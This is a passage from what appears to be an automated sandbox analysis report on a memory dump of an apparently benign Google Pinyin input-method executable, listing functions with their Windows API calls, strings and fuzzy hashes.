POST, xrefs: 0045B8F7

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocClearFreeVariant
String ID: Content-Type$POST$application/x-www-form-urlencoded$https://clients2.google.com/accounts/ClientLogin
API String ID: 1665868789-1274363211
Opcode ID: 6c65e130c25744d375fc7171ecaeca4744fa1b5066e6619412fbf0d6699bdebd
Instruction ID: b87d6fed2f0624c32a333056f05a89e4f3eff91c628947b4119a8fbf684584a1
Opcode Fuzzy Hash: 6c65e130c25744d375fc7171ecaeca4744fa1b5066e6619412fbf0d6699bdebd
Instruction Fuzzy Hash: 567165B12047408FD314CF2DC885A16BBE5FFD9324F148A5DE5588B3A1DB35E80ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00427280, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 178COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004272AD

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

_memmove.LIBCMT ref: 00427324
_memmove.LIBCMT ref: 0042733E
_memmove.LIBCMT ref: 0042739D
_memmove.LIBCMT ref: 00427403
_memmove.LIBCMT ref: 0042741F

Strings

vector<T> too long, xrefs: 004272A8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 4034224661-3788999226
Opcode ID: bdf7eef3f265949d938d52b41eed6cbadedc06682690cd3f396b10aa675d0aaa
Instruction ID: 160d991f1764335dc60e2d88b0186a35470c0cfab16797eb0c0b54c99988bde2
Opcode Fuzzy Hash: bdf7eef3f265949d938d52b41eed6cbadedc06682690cd3f396b10aa675d0aaa
Instruction Fuzzy Hash: 5951C0727042128FC704DF29DC8582AB7E5EFC4314B488A6EFD45CB349EA38E909C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 004C3220, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80000001), ref: 004C33D5

Part of subcall function 00401710: RegCloseKey.ADVAPI32(?,?,?,004018A8,?), ref: 00401753

RegCloseKey.ADVAPI32(?,?,?,09D48295,00000000), ref: 004C330F

Part of subcall function 00401590: RegCloseKey.ADVAPI32(00000000,00403512,?,?,?,?,?,?,?,?,?,?,?,00510206,000000FF), ref: 00401597

Part of subcall function 004C7B10: RegCloseKey.ADVAPI32(?,004C4AED,00000000,00512DA0,000000FF,004C280F,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C7B1E

RegCloseKey.ADVAPI32(?,?,?,09D48295,00000000), ref: 004C3329

Strings

%s\%s, xrefs: 004C32C6
rls, xrefs: 004C3270
RLSs, xrefs: 004C32BC
Software\Google\Common\Rlz, xrefs: 004C32C1

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close
String ID: %s\%s$RLSs$Software\Google\Common\Rlz$rls
API String ID: 3535843008-4233612992
Opcode ID: 764c7bc56de5e174c088bd451c3f9eed29b096ce54e0fee5b09b9ba595a42960
Instruction ID: 8e0a0fad730a746c6dc02a7c845cc33285a698e88830f99371e0f80be6d89668
Opcode Fuzzy Hash: 764c7bc56de5e174c088bd451c3f9eed29b096ce54e0fee5b09b9ba595a42960
Instruction Fuzzy Hash: 3C418D792083408BC704DF15D881B9BB7E4FB88714F444D2EF84593291DB7DEA498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00456400, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68registrynetworkCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00020019,?,?), ref: 00456470
RegQueryValueExW.ADVAPI32 ref: 00456499
RegCloseKey.ADVAPI32 ref: 004564A3
InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004564B6

Strings

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00456466
User Agent, xrefs: 0045648B
Mozilla/4.0 (compatible; Win32), xrefs: 00456423

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$CloseInternetQueryValue
String ID: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings$Mozilla/4.0 (compatible; Win32)$User Agent
API String ID: 88576721-3817825068
Opcode ID: b7be8a24b39993f285ad64f0ed39ba2c6169872b901679895fcbe865b27f0abd
Instruction ID: 134a36eda2667bb3046e5702ff2b797488af5d1fe32784d35d2867417b16d2e5
Opcode Fuzzy Hash: b7be8a24b39993f285ad64f0ed39ba2c6169872b901679895fcbe865b27f0abd
Instruction Fuzzy Hash: EA21D275600301AFD320DB20CC49BAB73E9EFE9702F51881EB956C7291E7789848DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00454210, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045423C
GetTempPathW.KERNEL32(00000104), ref: 0045424D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00454262
GetLastError.KERNEL32 ref: 0045426C
_memset.LIBCMT ref: 00454291
GetTempFileNameW.KERNEL32(?,GU-,00000000,?), ref: 004542AD

Strings

GU-, xrefs: 004542A3

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Temp_memset$CreateDirectoryErrorFileLastNamePath
String ID: GU-
API String ID: 3251621297-143111987
Opcode ID: 4a814cd9ee0a3240de07cbcc2f844b5c9ca03a5a71b89e236dfdae3d12b8cf12
Instruction ID: 7c1bbd372cdbdb237d99a4f7243df262cd8242bcf570ff1f087be23b23b6be45
Opcode Fuzzy Hash: 4a814cd9ee0a3240de07cbcc2f844b5c9ca03a5a71b89e236dfdae3d12b8cf12
Instruction Fuzzy Hash: 9B1122B5654344ABD730DF22DC46BEB73E4AFA4701F40482DB989C71C1EA789188CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 004115B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32,?,?,?,?,?,?,?,?,?,?,0041386C,?,?,00000010), ref: 004115B9
GetProcAddress.KERNEL32 ref: 004115DB
GetCurrentProcess.KERNEL32(?), ref: 004115EC
FreeLibrary.KERNEL32(00000000), ref: 004115F6

Strings

IsWow64Process, xrefs: 004115CD
kernel32, xrefs: 004115B4

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressCurrentFreeLoadProcProcess
String ID: IsWow64Process$kernel32
API String ID: 3066816673-3789238822
Opcode ID: 18c57f13aa2f6c811a30e7d24bdd1e9fae0310153adcb767c724419bfc6cd6c8
Instruction ID: 16363e599d1de30fbd7cb1b01be21353db6921c3d25f99acff6231cd90108db9
Opcode Fuzzy Hash: 18c57f13aa2f6c811a30e7d24bdd1e9fae0310153adcb767c724419bfc6cd6c8
Instruction Fuzzy Hash: 771191758047029FC760DF6DC8486CB7BE0BFA9345F84491EF489C2210E339858A8F8A

Uniqueness

Uniqueness Score: -1.00%

Function 00455370, Relevance: 12.3, APIs: 8, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455404
lstrlenW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 00455482
_memset.LIBCMT ref: 004554E1
CreateFileW.KERNEL32(?,00000080,00000001,00000000,00000003,00000000,00000000), ref: 0045555C
GetFileSize.KERNEL32 ref: 0045557B
CloseHandle.KERNEL32(00000000), ref: 00455593
DeleteFileW.KERNEL32(?), ref: 00455605
_memset.LIBCMT ref: 00455629

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: File_memset$CloseCreateDeleteHandleSizelstrlen
String ID:
API String ID: 1401969099-0
Opcode ID: 3ac07996b5b5efe3f0def7fe8cbf052f9c4f962784cc82a8b2ae3c32422e114b
Instruction ID: 092b5be63119e31e2f2001d2f03bdd87db773fcabdb421059867f5932380aa9d
Opcode Fuzzy Hash: 3ac07996b5b5efe3f0def7fe8cbf052f9c4f962784cc82a8b2ae3c32422e114b
Instruction Fuzzy Hash: C991CF71204741AFC310DF25C890AABB3A9BF84305F44891EFD4997352E738E94DCB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0046D5F0, Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,09D48295), ref: 0046D63F
LeaveCriticalSection.KERNEL32(?,?), ref: 0046D673
EnterCriticalSection.KERNEL32(?,?,?), ref: 0046D775
LeaveCriticalSection.KERNEL32(?,?,?), ref: 0046D86D

Strings

Type appears to be in generated pool but wasn't , xrefs: 0046D81F
registered: , xrefs: 0046D82F
File appears to be in generated pool but wasn't registered: , xrefs: 0046D71E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: File appears to be in generated pool but wasn't registered: $Type appears to be in generated pool but wasn't $registered:
API String ID: 3168844106-1304342697
Opcode ID: 6259c8445d71e58803f0555350876a8c3bb26fb20a47ab1e425f296ee88e7aee
Instruction ID: a0e510360a4b600da8b442154dfaad2ba3f3600856812114c13ed8b33d4fb4f0
Opcode Fuzzy Hash: 6259c8445d71e58803f0555350876a8c3bb26fb20a47ab1e425f296ee88e7aee
Instruction Fuzzy Hash: AB714671A083418FC310DF25C884A5BBBE4FF98714F444A2EF59597391E778E909CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0045F580, Relevance: 10.7, APIs: 7, Instructions: 159fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F598
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,?,?,0045F781,00000000,00000000), ref: 0045F5B4
_malloc.LIBCMT ref: 0045F605
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0045F687
ReadFile.KERNEL32(?,00000000,00000404,?,00000000), ref: 0045F6A6
_memmove.LIBCMT ref: 0045F6D3
_free.LIBCMT ref: 0045F730

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$Read_free_malloc_memmove
String ID:
API String ID: 2793708502-0
Opcode ID: a81aa22cf368e844ce0ee8b3225fac8b1569c7ccf87c9d9d974199478372d516
Instruction ID: 41f7f3032f61e0842d457f0744f199c06a4a22afcfa88363c96ddb420941b7a7
Opcode Fuzzy Hash: a81aa22cf368e844ce0ee8b3225fac8b1569c7ccf87c9d9d974199478372d516
Instruction Fuzzy Hash: AE51C4B0A047456FE320DF24C944B2BB7E5AB94311F14493EE99687293E278E84D8B5B

Uniqueness

Uniqueness Score: -1.00%

Function 0041D560, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041D593

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

_memmove.LIBCMT ref: 0041D5DF
_memmove.LIBCMT ref: 0041D5F3
_memmove.LIBCMT ref: 0041D60A
_memmove.LIBCMT ref: 0041D64F

Strings

vector<T> too long, xrefs: 0041D58E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 4034224661-3788999226
Opcode ID: 540978faa3e2f6348c01563063beeeef165283c8635fda3b1eef299d3d2ebb29
Instruction ID: 9470e41614ea4468d2b4c4b5b679da17b0ce3df58c4e6cb162cdf45e36966376
Opcode Fuzzy Hash: 540978faa3e2f6348c01563063beeeef165283c8635fda3b1eef299d3d2ebb29
Instruction Fuzzy Hash: 7E3116B16003059FC714EF6ACD8586BB3E6EBD4305B148A3EE45683781FA75F944C698

Uniqueness

Uniqueness Score: -1.00%

Function 0050D4C9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PMDtoOffset.LIBCMT ref: 0050D59D
std::bad_exception::bad_exception.LIBCMT ref: 0050D5C7
__CxxThrowException@8.LIBCMT ref: 0050D5D5

Strings

Bad dynamic_cast!, xrefs: 0050D5BF

Memory Dump Source

Source File: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8OffsetThrowstd::bad_exception::bad_exception
String ID: Bad dynamic_cast!
API String ID: 1176828985-2956939130
Opcode ID: f2202d66ec36c90a075823fc106b0c475b4c340c04d3022dfb7d8e157f806318
Instruction ID: 7fe23f9ce5c244175d7fb560b1a561bb8f115f0164d8b1317f26a0997ee0d723
Opcode Fuzzy Hash: f2202d66ec36c90a075823fc106b0c475b4c340c04d3022dfb7d8e157f806318
Instruction Fuzzy Hash: 2E316D76A006199FCF14DFA8CC45AAEBBB0BF58315B244419ED01E72D1E734ED418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405250, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00405268

Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE3F0
Part of subcall function 004EE3DB: __CxxThrowException@8.LIBCMT ref: 004EE405
Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE416

std::_Xinvalid_argument.LIBCPMT ref: 004052A3

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

_memmove.LIBCMT ref: 0040530D

Strings

string too long, xrefs: 0040529E
GooglePinyinService.exe, xrefs: 00405259
invalid string position, xrefs: 00405263

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: GooglePinyinService.exe$invalid string position$string too long
API String ID: 1615890066-443506558
Opcode ID: 358607104a54b04c202b10e1c2fd737ab1ed7ec243e8411df42f08f9ac939496
Instruction ID: 7f2ddc6dfbb5cc795a5f01f9fbbf4ee3ecb9275d58a222d6452c743c5a223da1
Opcode Fuzzy Hash: 358607104a54b04c202b10e1c2fd737ab1ed7ec243e8411df42f08f9ac939496
Instruction Fuzzy Hash: 51318672304B148BC7149EADA88143BF3A9EF95762310097FE552D7290EA759850CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402230, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000025,00402C29,?,00000000), ref: 00402239

Part of subcall function 004050F0: lstrcmpiW.KERNEL32(?,00000000,?,?,?,0040224C,00000000,?,00000000,00000025,00402C29,?,00000000), ref: 0040510E

LeaveCriticalSection.KERNEL32(?,00000000,?,00000000,00000025,00402C29,?,00000000), ref: 00402254
LeaveCriticalSection.KERNEL32(?,00000000,?,00000000,00000025,00402C29,?,00000000), ref: 00402272

Strings

%),@, xrefs: 00402332

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enterlstrcmpi
String ID: %),@
API String ID: 431788158-3470382913
Opcode ID: a0ee03f7735dd91c53751c3d948a4b480959c55b1d16dd7a29bef37d9e620662
Instruction ID: e09a429ae228c59241874fd6290c268c06083751c73fbbb71ef28be9c2343e02
Opcode Fuzzy Hash: a0ee03f7735dd91c53751c3d948a4b480959c55b1d16dd7a29bef37d9e620662
Instruction Fuzzy Hash: 962195722003149BD720DBA4FD58B9AB7A9FF75325F00453AE501D76F0D3B4A84A9B98

Uniqueness

Uniqueness Score: -1.00%

Function 00411670, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNEL32(00000002,00000000,GPY2SETTINGS,00000000,?,?,?,0040DF77), ref: 0041167E

Part of subcall function 004112A0: _memset.LIBCMT ref: 004112C0
Part of subcall function 004112A0: GetVersionExW.KERNEL32 ref: 004112D4

CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000190,GPY2SETTINGS,?,?,?,0040DF77), ref: 004116CF
LocalFree.KERNEL32(?,?,?,?,0040DF77), ref: 004116E4
GetLastError.KERNEL32(?,?,?,0040DF77), ref: 004116EA
MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,?,?,?,?,0040DF77), ref: 00411722

Part of subcall function 00412F90: GetCurrentProcess.KERNEL32(00000008,?,09D48295,00000000,?,00000000), ref: 00412FEB
Part of subcall function 00412F90: OpenProcessToken.ADVAPI32(00000000), ref: 00412FF2
Part of subcall function 00412F90: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00413035
Part of subcall function 00412F90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413045
Part of subcall function 00412F90: HeapFree.KERNEL32(00000000), ref: 0041304C
Part of subcall function 00412F90: CloseHandle.KERNEL32(00000000), ref: 00413057

Strings

GPY2SETTINGS, xrefs: 00411674, 004116BE

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: FileProcess$FreeHeapMappingOpen$CloseConvertCreateCurrentErrorHandleLastLocalStringTokenVersionView_memset
String ID: GPY2SETTINGS
API String ID: 2326875920-1141039874
Opcode ID: 4ff60fdcd90750f3071c05f73c1befe2edf52e0ba5139bc3945f3b4063665ee1
Instruction ID: 1509bcbef776abc818122a77030b68c261ff33ba7b001624027d85aa69127cd6
Opcode Fuzzy Hash: 4ff60fdcd90750f3071c05f73c1befe2edf52e0ba5139bc3945f3b4063665ee1
Instruction Fuzzy Hash: C521BF74600701AFE3209F29CC05B4BBBE0AFD1710F54C92EF569C63A0D778E4448B5A

Uniqueness

Uniqueness Score: -1.00%

Function 004DD350, Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

CreateJobObjectW.KERNEL32 ref: 004DD389
GetLastError.KERNEL32(?,00000009,?,00000070), ref: 004DD395

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastObject
String ID:
API String ID: 4248079190-0
Opcode ID: aefc0d636a85021c79174f1acbfd9707e3bdbdbbeb986d90b924bb95a8f15cb0
Instruction ID: a2c3280cf6b41bef33a1c93c027834e196ea18f2ffe76ca49ddf35b9ee418cb1
Opcode Fuzzy Hash: aefc0d636a85021c79174f1acbfd9707e3bdbdbbeb986d90b924bb95a8f15cb0
Instruction Fuzzy Hash: 692194756083019FE320DF26DC52FABB7E4BF98705F40481EB689862D0DB799408CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00461870, Relevance: 10.5, APIs: 7, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000004,00001388,?,00000000,00420552,09D48295,00000007,?,00000000), ref: 0046187F
WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0046188E
ReleaseMutex.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00461898
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618A7
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618B7
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618BE
ReleaseMutex.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004618C8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
